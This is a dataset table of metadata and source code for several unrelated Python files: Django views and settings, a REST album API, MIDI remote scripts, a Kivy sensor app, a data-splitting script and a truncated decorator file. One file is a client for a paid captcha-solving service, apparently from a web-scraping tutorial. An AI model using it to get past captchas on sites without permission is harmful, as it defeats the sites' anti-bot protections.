blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
added45d9f890ae16299a1fb849752c08c2c61d8
|
2e70b3ce93762c5b66fba57f8b9cba37aacf0702
|
/new/jamah/views.py
|
1f7fc766792333f3fa42f0bba092105be267c21e
|
[] |
no_license
|
mahidul-islam/jamah
|
02be511fe119e8934ec7d5aa1eaa8e2b24fad246
|
c8ddf9a8094d33e8b1d6cb834eab3d9f18b1a9ea
|
refs/heads/master
| 2022-05-13T15:11:38.609550
| 2019-06-08T04:52:09
| 2019-06-08T04:52:09
| 184,331,276
| 2
| 0
| null | 2022-04-22T21:27:18
| 2019-04-30T21:04:06
|
Python
|
UTF-8
|
Python
| false
| false
| 6,444
|
py
|
from django.shortcuts import render
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.contrib import messages
from .forms import JamahCreateForm
from event.forms import EventCreateForm
from .models import Jamah, JamahMember
from user.models import MyUser
from event.models import Event, EventMember
from account.models import Account
def index(request):
template = loader.get_template('jamah/index.html')
if request.user.is_authenticated:
form = JamahCreateForm()
jamah_by_me = Jamah.objects.filter(creator = request.user)
jamah_by_all = request.user.jamahs_of_you.all()
all_jamah = Jamah.objects.all()
# print(jamah_by_all)
# print('-----------------------------------------------------------------')
context = {
'form': form,
'jamah_by_me': jamah_by_me,
'jamah_by_all': jamah_by_all,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def detail(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmembers = jamah.members.all()
events = jamah.events.all()
template = loader.get_template('jamah/detail.html')
form = EventCreateForm()
context = {
'eventForm': form,
'events': events,
'jamah': jamah,
}
return HttpResponse(template.render(context, request))
def alljamah(request):
template = loader.get_template('jamah/jamahs.html')
if request.user.is_authenticated:
form = JamahCreateForm()
all_jamah = Jamah.objects.all()
context = {
'form': form,
'all_jamah': all_jamah,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def join_jamah(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
# test if he requested already
jamahMember = JamahMember.objects.filter(member = request.user).filter(jamah = jamah)
if jamahMember.count():
jamahMember = jamahMember[0]
if jamahMember.still_to_be_excepted:
messages.success(request, 'You already requested to join !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
messages.success(request, 'You already are a Member !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
# user didnot requested before so create jamahMember
jamah.requested_to_join.add(request.user)
jamah.save()
account = Account(description = 'Jamah: ' + jamah.jamahname + ' ' + ' ,Member: ' + request.user.username)
account.save()
jamahMember = JamahMember(member=request.user, jamah=jamah, status='member', account=account).save()
messages.success(request, 'You requested to join the Group')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def create(request):
name = request.POST['jamahname']
account = Account(description = 'Jamah: ' + name + '\'s account')
account.save()
jamah = Jamah(jamahname = name, creator = request.user, account=account)
jamah.save()
jamah.members.add(request.user)
jamah.save()
account2 = Account(description = 'Jamah: ' + name + ' ' + ' ,Member: ' + request.user.username)
account2.save()
jamahMember = JamahMember(
member = request.user,
jamah = jamah,
status = 'creator',
still_to_be_excepted = False,
account = account2
).save()
# print(jamahMember)
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def save_member(request, jamah_id, jamahmember_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmember = JamahMember.objects.get(pk = jamahmember_id)
jamahmember.still_to_be_excepted = False
jamah.members.add(jamahmember.member)
jamah.requested_to_join.remove(jamahmember.member)
jamahmember.timestamp = timezone.now()
jamah.save()
jamahmember.save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
def remove_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
jamahmember.account.delete()
jamahmember.delete()
jamah.members.remove(member)
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def promote_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
if jamahmember.status == 'member':
jamahmember.status = 'admin'
elif jamahmember.status == 'admin':
jamahmember.status = 'modarator'
jamahmember.save()
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def create_jamah_event(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
name = request.POST['name']
messages.success(request, 'Added a Event for the jamah...')
account = Account(description = 'Event: ' + name + '\'s account')
account.save()
cost_account = Account(description = 'Event: ' + name + '\'s cost account')
cost_account.save()
event = Event(name = name, creator = request.user, account = account, jamah=jamah, cost_account=cost_account)
event.save()
event.members.add(request.user)
event.save()
member_account = Account(description = 'Event: ' + name + ' ' + ' ,Member: ' + request.user.username)
member_account.mother_account = event.account
member_account.save()
eventMember = EventMember(
member = request.user,
event = event,
status = 'creator',
accountant_account = member_account,
is_accountant = True,
is_head_accountant = True,
is_cost_observer = True,
).save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
|
[
"mizihan84@gmail.com"
] |
mizihan84@gmail.com
|
049aca3df698e02af2e577d8085b003078f81c03
|
187af52e7f5150a5341aaf0c245baefa5e44d2e0
|
/爬虫/第八章/3.点触验证码的识别/captach.py
|
713d7a21412eef592285e25417c0dcf1c2c798b6
|
[] |
no_license
|
ShaoLay/Python_PaChong
|
ea9bc3880daf5d775f214017184d70a63cd1130a
|
97db513ee07a14e07afa785628864d46cdb9ad03
|
refs/heads/master
| 2020-04-07T16:58:29.916471
| 2018-12-17T07:02:12
| 2018-12-17T07:02:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,389
|
py
|
import requests
from hashlib import md5
class Chaojiying(object):
def __init__(self, username, password, soft_id):
self.username = username
self.password = md5(password.encode('utf-8')).hexdigest()
self.soft_id = soft_id
self.base_params = {
'user': self.username,
'pass2': self.password,
'softid': self.soft_id,
}
self.headers = {
'Connection': 'Keep-Alive',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
}
def post_pic(self, im, codetype):
"""
im: 图片字节
codetype: 题目类型 参考 http://www.chaojiying.com/price.html
"""
params = {
'codetype': codetype,
}
params.update(self.base_params)
files = {'userfile': ('ccc.jpg', im)}
r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files,
headers=self.headers)
return r.json()
def report_error(self, im_id):
"""
im_id:报错题目的图片ID
"""
params = {
'id': im_id,
}
params.update(self.base_params)
r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)
return r.json()
|
[
"javs_shao@163.com"
] |
javs_shao@163.com
|
0fafd36ef08142b623213dd91d2bc34c83e31bda
|
0191d4695198ecc61ef9f599c07b3372e7ff10b8
|
/album/views.py
|
7ef7db17cbee57b293dad8a4b3bbbe31fc1e1298
|
[] |
no_license
|
caioaraujo/discoteka
|
f22ba641e57b40da2dd08ec1f6c4925699a7d89b
|
a44ffbe23ce1b36bcc8ad1287db3de13e995705a
|
refs/heads/master
| 2021-01-20T00:36:47.631669
| 2017-05-06T14:34:20
| 2017-05-06T14:34:20
| 89,159,473
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,132
|
py
|
from rest_framework.response import Response
from rest_framework.views import APIView
from album.models import Album as AlbumModel
from album.serializers import AlbumSerializer
from artista.models import Artista as ArtistaModel
from discoteka.exceptions import RegistroNaoEncontradoException, ValorObrigatorioException
class Album(APIView):
def post(self, request):
data = request.data
self.valida_preenchimento(data)
artista_id = data.get('artista')
self.valida_artista(artista_id)
album = AlbumModel()
album.nome = data.get('nome')
album.artista_id = data.get('artista')
album.ano_lancamento = data.get('ano_lancamento')
album.faixas = data.get('faixas')
album.save()
serializer = AlbumSerializer(album)
return Response(serializer.data)
def get(self, request):
albuns = AlbumModel.objects.filter(artista_id=request.GET.get('artista')).all()
serializer = AlbumSerializer(albuns, many=True)
return Response(serializer.data)
def valida_artista(self, artista_id):
artista = ArtistaModel.get_artista_por_id(pk=artista_id)
if not artista:
raise RegistroNaoEncontradoException("Artista %s não encontrado" % artista_id)
def valida_preenchimento(self, dados):
if not dados.get('artista'):
raise ValorObrigatorioException('Artista é obrigatório')
if not dados.get('nome'):
raise ValorObrigatorioException('Nome do álbum é obrigatório')
if not dados.get('ano_lancamento'):
raise ValorObrigatorioException('Ano de lançamento é obrigatório')
if not dados.get('faixas'):
raise ValorObrigatorioException('Nr. de faixas é obrigatório')
class AlbumId(APIView):
def delete(self, request, pk):
album = AlbumModel.get_album_por_id(pk=pk)
if not album:
raise RegistroNaoEncontradoException("Álbum não encontrado")
album.delete()
return Response({'message': 'Álbum removido com sucesso'}, content_type='application/json')
|
[
"c.felipe.araujo@gmail.com"
] |
c.felipe.araujo@gmail.com
|
384d1fd0f22eeef5459a04938bae73d253c4151e
|
5a017fc861db92e3a2919f260d54f1301afbb3e5
|
/MIDI Remote Scripts/_Framework/MidiMap.py
|
815ac4dd8f4cd29c3396fee38203738716dd33b9
|
[] |
no_license
|
kera67/livepy_diff_ten
|
8d8d0f3b76048f1fe5d4c0fbc02549dc922c7d5b
|
12a0af9e9c57d0721af5036ce23af549df2c95f0
|
refs/heads/master
| 2023-07-14T18:26:33.591915
| 2020-11-19T07:50:28
| 2020-11-19T07:50:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,626
|
py
|
from __future__ import absolute_import, print_function, unicode_literals
import Live
from .ButtonMatrixElement import ButtonMatrixElement
from .ButtonElement import ButtonElement
from .EncoderElement import EncoderElement
from .SliderElement import SliderElement
def make_button(name, channel, number, midi_message_type):
is_momentary = True
return ButtonElement(not is_momentary, midi_message_type, channel, number, name=name)
def make_slider(name, channel, number, midi_message_type):
return SliderElement(midi_message_type, channel, number, name=name)
def make_encoder(name, channel, number, midi_message_type):
return EncoderElement(midi_message_type, channel, number, Live.MidiMap.MapMode.absolute, name=name)
class MidiMap(dict):
def add_button(self, name, channel, number, midi_message_type):
assert name not in self.keys()
self[name] = make_button(name, channel, number, midi_message_type)
def add_matrix(self, name, element_factory, channel, numbers, midi_message_type):
assert name not in self.keys()
def one_dimensional_name(base_name, x, _y):
return u'%s[%d]' % (base_name, x)
def two_dimensional_name(base_name, x, y):
return u'%s[%d,%d]' % (base_name, x, y)
name_factory = two_dimensional_name if len(numbers) > 1 else one_dimensional_name
elements = [ [ element_factory(name_factory(name, column, row), channel, identifier, midi_message_type) for column, identifier in enumerate(identifiers) ] for row, identifiers in enumerate(numbers) ]
self[name] = ButtonMatrixElement(rows=elements)
|
[
"aumhaa@gmail.com"
] |
aumhaa@gmail.com
|
1b06f8f93e9915353990e1e374d47340e80aacab
|
c3e70e85773da05cdf7375d34ebcb3a5560aaa9f
|
/Greedy/CodingTest_ver3/볼링공_고르기.py
|
72a0ff9cc7e747edef4da3aec8ddef01c5732e23
|
[] |
no_license
|
hongyeon-kyeong/Algorithm
|
5409f0472bd409b957f390b6adae0c67976dda85
|
def11fd33f286013837317968991e6b87cc643c3
|
refs/heads/main
| 2023-04-01T13:43:35.982871
| 2021-03-23T12:20:20
| 2021-03-23T12:20:20
| 318,711,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
n, m = map(int, input().split())
data = list(map(int, input().split()))
weights = [0] * (n+1)
for i in range(n) :
weights[data[i]] += 1
count = 0
for i in range(1, m+1) :
n -= weights[i]
count += (weights[i] * n)
print(count)
# 횟수단축
|
[
"hyjykelly@gmail.com"
] |
hyjykelly@gmail.com
|
2dcca14dad5d66de58e425dcc274f0f0a2df7e22
|
f4f0b7feb71ba719b373735bc39efb2ebcdddcd8
|
/solution/ourFeature/pre.py
|
a09d54d5798f50e05dcbb9afe0a3cb80329aa5e7
|
[] |
no_license
|
fuhailin/2018-Big-Data-Challenge
|
112ef765e9866f1b6e521711100aff871d66cb27
|
419db72e110079f208197e9bd8dee0991a72f5a1
|
refs/heads/master
| 2020-03-20T03:59:15.308366
| 2018-06-26T15:01:50
| 2018-06-26T15:01:50
| 137,166,621
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,778
|
py
|
"""
author: yang yiqing
comment: 数据预处理
date: 2018年06月16日16:32:00
"""
import pandas as pd
import numpy as np
def split_data(action, launch, register, video):
print('split data...')
for i in range(Num_dataSet):
start_date = start_date_list[i]
end_date = end_date_list[i]
temp_action = action[(action.day >= start_date) & (action.day <= end_date)]
temp_launch = launch[(launch.day >= start_date) & (launch.day <= end_date)]
temp_register = register[(register.day >= start_date) & (register.day <= end_date)]
temp_video = video[(video.day >= start_date) & (video.day <= end_date)]
temp_all_user = np.unique(
temp_action['user_id'].tolist() + temp_register['user_id'].tolist() + temp_launch['user_id'].tolist() +
temp_video['user_id'].tolist())
temp_label_user = np.unique(
action[(action.day > end_date) & (action.day <= end_date + 7)]['user_id'].tolist() +
launch[(launch.day > end_date) & (launch.day <= end_date + 7)]['user_id'].tolist() +
register[(register.day > end_date) & (register.day <= end_date + 7)]['user_id'].tolist() +
video[(video.day > end_date) & (video.day <= end_date + 7)]['user_id'].tolist())
# get label
temp_DF = get_label(temp_all_user, temp_label_user)
# save file
# df中是user_id和label,其他日志文件通过user_id来left merge到df中即可
temp_DF.to_csv('splited_date/df_%d_%d.csv' % (start_date, end_date))
temp_action.to_csv('splited_date/action_%d_%d.csv' % (start_date, end_date))
temp_launch.to_csv('splited_date/launch_%d_%d.csv' % (start_date, end_date))
temp_register.to_csv('splited_date/register_%d_%d.csv' % (start_date, end_date))
temp_video.to_csv('splited_date/video_%d_%d.csv' % (start_date, end_date))
def get_label(all_user, label_user):
print('get label...')
print(len(all_user))
# 测试集的label全为0
print(len(label_user))
df = pd.DataFrame()
df['user_id'] = all_user
label = np.zeros(len(all_user))
for i in range(len(all_user)):
label[i] = 1 if all_user[i] in label_user else 0
df['label'] = label
df['label'] = df['label'].astype(int)
return df
if __name__ == '__main__':
# 修改时间窗只需要修改下面的参数即可
Num_dataSet = 3
start_date_list = [1, 8, 15]
end_date_list = [16, 23, 30]
# read data
action = pd.read_csv('data/action.csv', index_col=0)
launch = pd.read_csv('data/launcher.csv', index_col=0)
register = pd.read_csv('data/register.csv', index_col=0)
video = pd.read_csv('data/video.csv', index_col=0)
split_data(action, launch, register, video)
|
[
"hailinfufu@outlook.com"
] |
hailinfufu@outlook.com
|
e50058dbb805fd455badad57c4025ef3de68f4d1
|
cd594b9a01ca5a587c0d30c9b41fa099af93f98e
|
/books/orders/urls.py
|
30c514984788da44c258b8c65bb0ef4be70779ed
|
[] |
no_license
|
raj713335/Django_Professional
|
54bf628aa75d81ef2266d6a0c6b53d1705744f3d
|
96daff2dc38cda21aa9683ca0b023cd55705323f
|
refs/heads/master
| 2023-02-07T17:04:11.668927
| 2020-12-30T11:11:23
| 2020-12-30T11:11:23
| 324,566,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
# orders/urls.py
from django.urls import path
from .views import OrdersPageView, charge
urlpatterns = [
path('charge/', charge, name='charge'),
path('', OrdersPageView.as_view(), name='orders'),
]
|
[
"raj713335@gmail.com"
] |
raj713335@gmail.com
|
56a56c8ead80145924257961f4a0b23562f2d0d9
|
014e4be9addc57eb5599086dc82ba431ed406e81
|
/Lesson_2/HW_2/test_file.py
|
b0e024eeb7ef334a196097e664b346ae69432e64
|
[] |
no_license
|
ZakirovRail/back_end
|
a4f20c099562f901bb107c8e7b333c890cd7995f
|
0a03ef5d3283b7a6d22e1848ae8c55c4caef8010
|
refs/heads/main
| 2023-03-31T00:25:06.568394
| 2021-03-23T07:44:42
| 2021-03-23T07:44:42
| 334,494,409
| 0
| 0
| null | 2021-03-11T12:13:36
| 2021-01-30T19:27:57
|
Python
|
UTF-8
|
Python
| false
| false
| 808
|
py
|
import csv
data_to_export = [['Изготовитель системы', 'Название ОС', 'Код продукта', 'Тип системы'], ['LENOVO', 'ACER', 'DELL'], ['Microsoft Windows 7 Профессиональная', 'Microsoft Windows 10 Professional', 'Microsoft Windows 8.1 Professional'], ['00971-OEM-1982661-00231', '00971-OEM-1982661-00231', '00971-OEM-1982661-00231'], ['x64-based PC', 'x64-based PC', 'x86-based PC']]
def write_to_csv(list):
with open('task_1.csv', 'w') as file:
fn_write = csv.writer(file,quoting=csv.QUOTE_NONNUMERIC)
for row in data_to_export:
fn_write.writerow(row)
write_to_csv(data_to_export)
# with open('lesson_csv.csv', 'w') as fn:
# fn_write = csv.writer(fn)
# for row in data:
# fn_write.writerow(row)
|
[
"rjzakirov@gmail.com"
] |
rjzakirov@gmail.com
|
21edcbda377b2af56762d1185106281cd740f5c3
|
d8641ab3265371b9926222a80b93e039a96acd36
|
/chapter_15/styleChage.py
|
c65955ed2b01950d7e2e3a0e921769cdf3408258
|
[] |
no_license
|
fahimkk/automateTheBoringStuff
|
af2256f10c8c4ea156e003291a6a309c2ae8dc7d
|
6022f2dd4381a378fe360696b6a9f44cd77f873d
|
refs/heads/master
| 2022-12-08T20:52:25.400695
| 2020-09-05T10:43:09
| 2020-09-05T10:43:09
| 284,317,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
import docx
import logging
logging.basicConfig(level=logging.DEBUG)
doc = docx.Document('demo.docx')
logging.debug(doc.paragraphs[0].text)
doc.paragraphs[0].style = 'Normal'
doc.paragraphs[1].runs[0].style = 'QuoteChar'
logging.debug(doc.paragraphs[1].runs[0].text)
doc.paragraphs[1].runs[1].underline = True
logging.debug(doc.paragraphs[1].runs[1].text)
doc.paragraphs[1].runs[2].underline = True
logging.debug(doc.paragraphs[1].runs[2].text)
doc.save('restyled.docx')
|
[
"fahimasharafkk@gmail.com"
] |
fahimasharafkk@gmail.com
|
650a8a893c1dcebd6bb63eb7ae18ee8468bf566d
|
3c1e51cdc1e8fe95cd1dc9674954622b7ee1e71a
|
/backend/mobilegeee_28456/settings.py
|
60372fff369e36c9a4d533d7b555077d3c91e624
|
[] |
no_license
|
crowdbotics-apps/mobilegeee-28456
|
ed22c9fd3008f73442bee4af7fed0887a5ae436d
|
dedcfddd27f9707bfc584f602341cc32d2e79034
|
refs/heads/master
| 2023-06-09T02:30:41.908432
| 2021-07-05T13:52:25
| 2021-07-05T13:52:25
| 383,155,833
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,114
|
py
|
"""
Django settings for mobilegeee_28456 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mobilegeee_28456.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mobilegeee_28456.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
e924dd9290da87bcf7962e4a2e76cf2fac9d5e8a
|
9e461f40bbdf63d9c00c99f398758f5b236db863
|
/Python/motion_client/main.py
|
017a2466ac1b43da634527a033e525fdbcd3ed5c
|
[] |
no_license
|
robbynickles/portfolio
|
b490a98de9bc7daf6d14b074b2726a06359a8462
|
269b0593ce5e0773fa18f74c4374fcc0bccc5c40
|
refs/heads/master
| 2021-01-10T05:17:00.762021
| 2015-12-25T00:36:23
| 2015-12-25T00:36:23
| 48,555,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,567
|
py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.core.window import Window
w, h = Window.width, Window.height
from libs.swipeplane2 import SwipePlane
from libs.device.device_view import DeviceTest
from libs.client.client_view import Client
from plyer import accelerometer, compass, gyroscope
from plyer.libs.server_utils import shutdown_server_thread
class MobileSensorTest(BoxLayout):
def __init__(self):
super(MobileSensorTest, self).__init__()
self.add_widget( DeviceTest( 'Accel', 'Accelerometer', accelerometer, accelerometer._get_acceleration ) )
self.add_widget( DeviceTest( 'Compass', 'Compass', compass, compass._get_orientation ) )
self.add_widget( DeviceTest( 'Gyro', 'Gyroscope', gyroscope, gyroscope._get_orientation ) )
def input_sources( self ):
return self.children
class MobileSensorTestApp(App):
def on_pause(self):
return True
def on_resume(self):
pass
def on_stop(self):
shutdown_server_thread()
def build(self):
swipe_plane = SwipePlane()
self.mobile_sensor_test = MobileSensorTest()
page1 = BoxLayout( pos=(0,0), size=(w, h) )
page1.add_widget( self.mobile_sensor_test )
swipe_plane.add_page( page1 )
page2 = BoxLayout( pos=(1.2*w,0), size=(w, h) )
page2.add_widget( Client( self.mobile_sensor_test.input_sources(), cols=1 ) )
swipe_plane.add_page( page2 )
return swipe_plane
if __name__ == '__main__':
MobileSensorTestApp().run()
|
[
"r.nickles7@gmail.com"
] |
r.nickles7@gmail.com
|
a5dbdb6f26c7bfee74ad32ab213debd273d682df
|
b92c39c8498e0c6579a65430e63b7db927d01aea
|
/python/cookbook/decorator_3.py
|
d19549b43373954c5dcf57ea393088dd0dcf6812
|
[] |
no_license
|
szqh97/test
|
6ac15ad54f6d36e1d0efd50cbef3b622d374bb29
|
ba76c6ad082e2763554bdce3f1b33fea150865dc
|
refs/heads/master
| 2020-04-06T05:40:55.776424
| 2019-01-14T06:37:38
| 2019-01-14T06:37:38
| 14,772,703
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps, partial
import logging
def logged(func=None, *, level=logging.DEBUG, name=None, message=None):
